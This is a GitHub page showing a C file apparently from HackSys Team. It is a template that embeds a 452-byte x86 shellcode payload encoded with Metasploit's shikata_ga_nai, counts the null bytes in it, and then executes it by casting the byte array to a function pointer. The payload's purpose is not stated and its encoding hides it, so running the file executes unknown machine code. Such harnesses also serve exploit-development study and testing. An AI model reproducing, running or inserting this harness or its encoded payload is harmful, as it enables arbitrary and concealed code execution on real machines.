-
Notifications
You must be signed in to change notification settings - Fork 27
/
ShellcodeTestMetasploitShikataGaNaiEncoded.c
95 lines (72 loc) · 3.34 KB
/
ShellcodeTestMetasploitShikataGaNaiEncoded.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#include <stdio.h>
#include <string.h>
/*
_ __ _____
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
|___/
http://hacksys.vfreaks.com/
hacksysteam@hotmail.com
Module Name:
Shellcode Test Encoded
Abstract:
This program is used as a template to test
C style formatted shellcodes. A decoder is
already added to the final shellcode output.
IDE:
Dev-C++ 4.9.9.2 (Windows XP SP3)
Compiler:
gcc 3.4.2
*/
/*
* [*] x86/shikata_ga_nai succeeded with size 452 (iteration=1)
*/
unsigned char shellcode[] =
"\xdd\xc2\xbd\x7d\x18\xca\x70\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x6b\x83\xe8\xfc\x31\x68\x14\x03\x68\x69\xfa\x3f\x9b\xcb\xcb"
"\x7f\xd7\xdf\xa8\x81\x3e\x4c\xff\xb0\x65\x43\x3f\x1e\x58\x60"
"\xba\x5e\x98\xe5\x3d\x60\x6b\x1a\x7c\xaa\x96\xe5\xb4\x75\xc2"
"\x61\x48\xc6\x1f\x57\x8d\x4f\x0f\xec\x52\x6c\x3b\xb6\x50\xf4"
"\xb6\x32\x57\x54\x42\x7a\x77\xd9\x48\x78\x9f\x22\x8f\x83\xa0"
"\xfe\xfb\x30\x7b\x8c\xf0\xcc\xe5\x05\x0c\x91\xcc\xe6\xf2\x11"
"\x0f\x92\x56\x0d\x82\xb8\x72\xa6\x98\x43\x0f\xbc\xa2\x80\x21"
"\x75\xc6\xa7\x72\x85\x07\xa8\xf9\xc5\x0b\x23\xbd\xd9\x98\x63"
"\x36\x6a\xe6\xa3\xcd\x6c\x2d\xeb\xc9\x19\xa2\x9b\x8d\xba\x46"
"\xf7\x26\x2c\xe6\x60\xb2\x24\x4f\xba\x88\x8f\xe7\xd5\x61\x8d"
"\x20\xb1\x06\xde\x89\xae\x61\xe6\xf0\x9f\xbd\x8e\x26\x02\x5b"
"\x7d\x5e\x58\x36\x86\x39\x92\x38\x0b\x40\xd5\xb3\x07\xe2\x3d"
"\x27\x9c\x40\xe6\x44\x5d\x98\x6f\xb6\xf8\x48\xfb\x7b\x47\x6a"
"\x13\xe8\x48\x94\x1c\xb6\xe6\x2c\x01\xa9\x8f\x56\x2e\x25\x67"
"\x47\x4e\xc5\x88\x1e\xdc\x53\x10\xac\x30\xc0\xb0\x3e\x4d\xe3"
"\x36\xe1\x27\xe4\x9f\x94\x77\x3b\xcd\xf5\xd5\x56\xf2\xab\xb3"
"\xa5\x9c\x4b\x44\xaa\x9c\x1a\xcf\xf7\x08\x5c\x1c\x57\xb3\x4e"
"\xa7\x69\x61\xdc\x25\xd5\xa1\xe5\x66\xb4\xfb\xb7\xda\x50\xdb"
"\x37\xd2\xa0\x4b\xb3\xb9\xa8\x94\x10\xbe\xdd\x4e\x93\xca\x43"
"\x82\x64\x1f\xf6\x1c\xdc\xa0\x09\x20\xb1\xc8\x09\x30\x31\x09"
"\x60\x31\xbc\x8f\x6e\x31\xbe\x8f\xde\xbc\x38\x9f\xde\xbe\x44"
"\xf0\xb4\xb2\xc9\xb6\x40\x9a\x5a\x6b\x51\xe5\x8e\xfc\x99\x19"
"\x31\xfd\x92\x44\x35\x02\x77\xff\xcc\x7f\x3e\xf7\x2f\x62\x32"
"\x6d\x30\xe9\x10\x61\xcf\x3e\x42\xfc\xd0\x3e\x6c\xa2\x2e\x9d"
"\x93\x74\x2f\x41\x94\xcb\x2f\x43\x94\x97\x2f\xb3\x94\x69\x30"
"\xe7\x94\x33\x30\x54\x95\xbb\x30\x0a\x95\xcc\x30\xe4\x95\x57"
"\x31\x9c\x95\xb7\x31\x3e\x96\xce\x31\x9e\x96\x78\x32\xbf\x96"
"\x1b\x32\x54\x97\x88\x32\xd3\x97\x5d\x33\x03\x98\xf5\x33\x26"
"\x98\x94\x33\xc5\x98\x56\x34\x40\x10\xb3\x05\xaa\x62\x66\xa4"
"\x26\x63";
main()
{
int i, badchar_c = 0;
printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1);
for(i = 0; i < sizeof(shellcode)-1; ++i) {
if(((unsigned char *)shellcode)[i] == 0x00) {
badchar_c = badchar_c + 1;
}
}
printf("\nNumber of badchar: %d\n\n", badchar_c);
printf("\nPress any key to execute shellcode....\n\n");
getch();
int (*ret)() = (int(*)())shellcode;
ret();
}